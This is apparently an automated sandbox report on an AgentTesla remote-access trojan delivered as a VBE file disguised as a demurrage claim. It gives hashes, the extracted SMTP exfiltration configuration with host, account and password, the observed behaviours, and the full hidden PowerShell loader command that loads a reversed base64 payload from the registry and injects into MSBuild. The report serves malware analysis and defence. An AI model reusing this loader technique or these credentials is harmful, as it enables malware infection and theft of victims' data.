Analysis
-
max time kernel
300s -
max time network
284s -
platform
windows11-21h2_x64 -
resource
win11-20250410-en -
resource tags
arch:x64arch:x86image:win11-20250410-enlocale:en-usos:windows11-21h2-x64system -
submitted
23/04/2025, 07:24
Static task
static1
Behavioral task
behavioral1
Sample
Demurrage Claim 20250422pdf.vbe
Resource
win10v2004-20250313-en
General
-
Target
Demurrage Claim 20250422pdf.vbe
-
Size
1.4MB
-
MD5
3cad1f3c2c6f0a5652402adb31314137
-
SHA1
cfa7f80e00c931b0107ae8b9d588fea375fa8486
-
SHA256
bce73437ffc825f4af0e0a4a14b5d2f1a52c55d324be9ad415b2ed257274335e
-
SHA512
96ed0e88756c77206d187059bd39fadeb597466940265c8a35b40ba60b30fce71427e84ebc32806d96046fd0f82c1215f334cff97d81c5f70ebc881d7162a005
-
SSDEEP
24576:Sk6YLtW+5pCOOrwBfeom3RDRoM8cLIRk3tAaLMgs4GM4IVj:Tmf5
Malware Config
Extracted
agenttesla
Protocol: smtp- Host:
162.254.34.31 - Port:
587 - Username:
[email protected] - Password:
26ivK6IyAzFg - Email To:
[email protected]
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Agenttesla family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 1588 powershell.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 1 api.ipify.org 2 api.ipify.org -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1588 set thread context of 3152 1588 powershell.exe 81 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 1588 powershell.exe 1588 powershell.exe 1588 powershell.exe 1588 powershell.exe 3152 MSBuild.exe 3152 MSBuild.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 1588 powershell.exe Token: SeDebugPrivilege 3152 MSBuild.exe -
Suspicious use of WriteProcessMemory 10 IoCs
description pid Process procid_target PID 1732 wrote to memory of 1588 1732 WScript.exe 79 PID 1732 wrote to memory of 1588 1732 WScript.exe 79 PID 1588 wrote to memory of 3152 1588 powershell.exe 81 PID 1588 wrote to memory of 3152 1588 powershell.exe 81 PID 1588 wrote to memory of 3152 1588 powershell.exe 81 PID 1588 wrote to memory of 3152 1588 powershell.exe 81 PID 1588 wrote to memory of 3152 1588 powershell.exe 81 PID 1588 wrote to memory of 3152 1588 powershell.exe 81 PID 1588 wrote to memory of 3152 1588 powershell.exe 81 PID 1588 wrote to memory of 3152 1588 powershell.exe 81 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Demurrage Claim 20250422pdf.vbe"1⤵
- Suspicious use of WriteProcessMemory
PID:1732 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\yDvToprFnFadMKC' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [lol.lol]::lol('yDvToprFnFadMKC')2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1588 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3152
-
-
-
C:\Windows\System32\WScript.exeC:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Roaming\yDvToprFnFadMKC.vbs"1⤵PID:4360
Network
MITRE ATT&CK Enterprise v16
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
2KB
MD58a6f1dc340c8fd382cb7b83dd847abb9
SHA111ea640dbd766f6af0198f13eff948f9db497b97
SHA256e71ae8ec42dfd7029ccea570d56183ad56c7f88856d633b8740818524bbfa0a7
SHA5122048271c5ef045d92606c59d17773f7e54bd143fb6d43a4b6022419530061088cdcca6d83f4282516c01ba523244f7213269d8f213e7208bdb86e4b4a8f2fa91